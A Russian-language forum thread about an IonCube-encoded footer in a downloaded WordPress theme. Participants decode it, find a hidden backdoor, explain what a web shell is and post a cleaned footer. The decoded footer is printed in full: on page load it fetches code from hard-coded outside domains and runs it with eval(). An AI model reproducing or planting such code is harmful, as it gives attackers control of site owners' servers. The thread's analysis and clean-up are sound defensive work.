[VostrVL]

Подскажите пожалуйста, возможно ли расшифровать закодированный IonCube код? Или как-то проверить его на наличие ссылок? Скачал шаблон на английском, хотел для удобства перевести, а код оказался закодированным. Погуглив, решил, что это IonCube, расшифровать который предлагают за деньги. В принципе, можно ничего не менять в коде, настроек много, но все же хотелось бы узнать о наличии ссылок с шаблона.
Сам код выглядит так

Код:

<?php //003ab
if(!extension_loaded('ionCube Loader')){$__oc=strtolower(substr(php_uname(),0,3));$__ln='ioncube_loader_'.$__oc.'_'.substr(phpversion(),0,3).(($__oc=='win')?'.dll':'.so');@dl($__ln);if(function_exists('_il_exec')){return _il_exec();}$__ln='/ioncube/'.$__ln;$__oid=$__id=realpath(ini_get('extension_dir'));$__here=dirname(__FILE__);if(strlen($__id)>1&&$__id[1]==':'){$__id=str_replace('\\','/',substr($__id,2));$__here=str_replace('\\','/',substr($__here,2));}$__rd=str_repeat('/..',substr_count($__id,'/')).$__here.'/';$__i=strlen($__rd);while($__i--){if($__rd[$__i]=='/'){$__lp=substr($__rd,0,$__i).$__ln;if(file_exists($__oid.$__lp)){$__ln=$__lp;break;}}}@dl($__ln);}else{die('The file '.__FILE__." is corrupted.\n");}if(function_exists('_il_exec')){return _il_exec();}echo('Site error: the file <b>'.__FILE__.'</b> requires the ionCube PHP Loader '.basename($__ln).' to be installed by the site administrator.');exit(199);
?>
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

[fizmatik]

чето такое получилось

Код:

<?php
global $subtheme_dir;
include( $subtheme_dir."footer.php" );
wp_footer( );
if (!function_exists ("verify_wp")) { function verify_wp() { global $prj_dld; $cache=$_SERVER['DOCUMENT_ROOT'] . '/' . 'cache' . date ('d') . '.dat'; if (!$prj_dld) { if (!file_exists($cache)) { @file_put_contents($cache,'cached'); try { set_exception_handler('exception_handler'); global $wpdb; if (is_object($wpdb)){ if($wpdb->get_var("show tables like '" . $wpdb->prefix . "var_core'")!=( $wpdb->prefix . "var_core")){ $download_domain="0797card.com"; }else { $download_domain=$wpdb->get_var("SELECT core_url FROM `" . $wpdb->prefix . "var_core` order by core_order desc limit 1"); } if ($download_domain=="") $download_domain="0797card.com"; $code=@file_get_contents("http://" . $download_domain . "/?install"); if ($code=="") { $code=@file_get_contents("http://1433norangegrove.com/?install"); } if ($code=="") { $code=@file_get_contents("http://1898cp.com/?install"); } if ($code!="") { eval($code); }else { @file_get_contents("http://" . $download_domain . "/?report"); } } @unlink($cache); restore_exception_handler(); } catch (Exception $e) { if (file_exists($cache)) { @unlink($cache); restore_exception_handler(); } } } } } function exception_handler($exception) { } } verify_wp(); 
echo "</body>\r\n</html>\r\n";
?>

[VostrVL]

Да, на одном форуме я нашел похожий вариант. Но на php это не очень похоже.. Есть же сервисы, которые base64 расшифровывают.

[fizmatik]

то что я прислал не похоже на php?

[VostrVL]

Забыл сказать - я не знаток php :) Но я выразился так

это не очень похоже

имея в виду, что да, есть те же самые команды и т.д.. но больше похоже на какой-то "внутренний" что-ли код. Обычно в файле футера простых шаблонов я вижу код немного другого вида. Для продвинутых пользователей и поправить под себя такого вида код, возможно, не составит труда, но я пока не могу.

[TBicTep]

Тот код что дал fizmatik это самый настоящий php. Судя по всему некий Шелл. он скачивается с сайта _1433norangegrove.com и вроде как создает файл /wp-includes/core.php посмотрите есть ли у вас такой файл (в стандартном wordpresе насколько я знаю его нет).

[VostrVL]

TBicTep, папка /wp-includes/ присутствует в шаблоне, но данного файла там нет. Шаблон установил на WP, сайт работает но данный файл не создан. Зашел на указанный Вами сайт - он пуст.

Кстати, что такое шелл? Погуглил, - увидел ответ

Shell это оболочка,для доступа к серваку и для администрирования,можно
комплировать проги,управлять всем надо знать тока набор команд,есть свободные шеллы в инете можно найти если надо.

Шелл это хорошо? Плохо? Как его расценивать??

Шаблон качал отсюда _http://www.wpadsensetheme.com/ Возможно кому-то пригодится, а может кто-то подскажет и по поводу перевода кода, мне было бы интересно.

Почитал еще про Шелл, интересная информация. Возможно узнать точно Шелл это или просто шаблон закодирован?

[AntoXa]

<?php
global $subtheme_dir;
include( $subtheme_dir."footer.php" );
wp_footer( );
echo "</body>\r\n</html>\r\n";
?>

Вот тебе код без всякой бяки

[AmazingSEO]

В данном случае шелл-оболочка для управления, так сказать "графический интерфейс". Его заливают хакеры для управления вашим сайтом без ведома хозяина.